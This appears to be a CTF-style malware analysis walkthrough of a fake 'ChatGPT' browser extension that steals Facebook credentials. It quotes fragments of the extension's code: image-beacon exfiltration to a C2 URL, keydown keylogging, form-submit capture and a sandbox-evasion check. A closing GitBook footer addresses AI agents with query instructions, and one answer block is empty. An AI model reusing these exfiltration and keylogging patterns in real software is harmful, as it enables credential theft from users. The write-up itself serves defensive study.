> For the complete documentation index, see [llms.txt](https://omar-4.gitbook.io/omar-khalid/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://omar-4.gitbook.io/omar-khalid/pages/projects/fakegpt-malware-analysis-walkthrough.md).
# FakeGPT β Malware Analysis Walkthrough
**Category:** Malware Analysis\
**Tactics:** Credential Access, Collection, Command and Control, Exfiltration\
**Tools Used:** JavaScript static analysis, browser extension inspection, ExtAnalysis, CyberChef
***
### π§ Scenario
Employees reported strange behavior after installing a browser extension named βChatGPT.β Your task: reverse-engineer the extension to identify its malicious behavior and exfiltration techniques.
***
### π Files in the Extension
* `manifest.json` β Extension metadata
* `app.js` β Handles data capture and exfiltration
* `loader.js` β Loads core logic, anti-analysis checks
* `core.js` β Shared logic
* `ui.html` β Display interface
* `sussy.gif` β Decoy media
***
### π Analysis and Q\&A
***
#### πΉ Q1: **Which encoding method does the browser extension use to obscure target URLs?**
In `app.js`, the presence of `==` padding in strings is a strong indicator of **Base64** encoding. Decoding reveals the target URL.
β **Answer:**
```
base64
```
***
#### πΉ Q2: **Which website does the extension monitor for data theft?**
The decoded Base64 string shows:
```
https://www.facebook.com
```
β **Answer:**
```
www.facebook.com
```
***
#### πΉ Q3: **Which type of HTML element is used to send stolen data?**
From the `sendToServer` function:
```js
let img = document.createElement('img');
img.src = C2_URL + "?data=" + encryptedData;
```
β **Answer:**
```
```
***
#### πΉ Q4: **What is the first condition that triggers the extension to deactivate itself?**
`loader.js` checks if no plugins are detected (a common trait of headless environments):
```js
if (navigator.plugins.length === 0)
```
β **Answer:**
```
navigator.plugins.length === 0
```
***
#### πΉ Q5: **Which event does the extension capture to track form submissions?**
In `app.js`, credentials are intercepted on form submission:
```js
form.addEventListener("submit", ...)
```
β **Answer:**
```
submit
```
***
#### πΉ Q6: **Which method is used to capture keystrokes?**
Also in `app.js`, keylogging is implemented via:
```js
document.addEventListener("keydown", ...)
```
β **Answer:**
```
keydown
```
***
#### πΉ Q7: **What is the domain where exfiltrated data is sent?**
Exfiltration happens via image beaconing to:
β **Answer:**
```
Mo.Elshaheedy.com
```
***
#### πΉ Q8: **Which function exfiltrates credentials?**
Found in `app.js`:
```js
exfiltrateCredentials(username, password);
```
β **Answer:**
```
exfiltrateCredentials
```
***
#### πΉ Q9: **Which encryption algorithm secures data before exfiltration?**
The `encryptPayload()` function uses:
* **Algorithm:** AES
* **Key:** `"SuperSecretKey123"`
* **IV:** Random, generated per message
β **Answer:**
```
AES
```
***
#### πΉ Q10: **What browser API is used to manipulate cookies?**
As defined in `manifest.json`, the extension uses:
β **Answer:**
```
cookies
```
***
### π‘οΈ MITRE ATT\&CK Mapping
| Tactic | Technique ID | Description |
| ----------------- | ------------ | --------------------------------- |
| Execution | T1203 | Exploitation for Client Execution |
| Credential Access | T1056, T1555 | Input Capture, Credential Theft |
| Collection | T1113, T1056 | Screen & Input Capture |
| Exfiltration | T1041 | Exfil over C2 Channel |
| Defense Evasion | T1027 | Obfuscated Files or Scripts |
***
### β Conclusion
The FakeGPT extension:
* Mimics ChatGPT to appear legitimate
* Steals credentials and keystrokes
* Encrypts data using AES
* Sends it to a hardcoded exfil domain
* Disables itself in sandbox environments
A clean example of real-world, browser-based credential theft with stealth features.
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:
```
GET https://omar-4.gitbook.io/omar-khalid/pages/projects/fakegpt-malware-analysis-walkthrough.md?ask=&goal=
```
`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.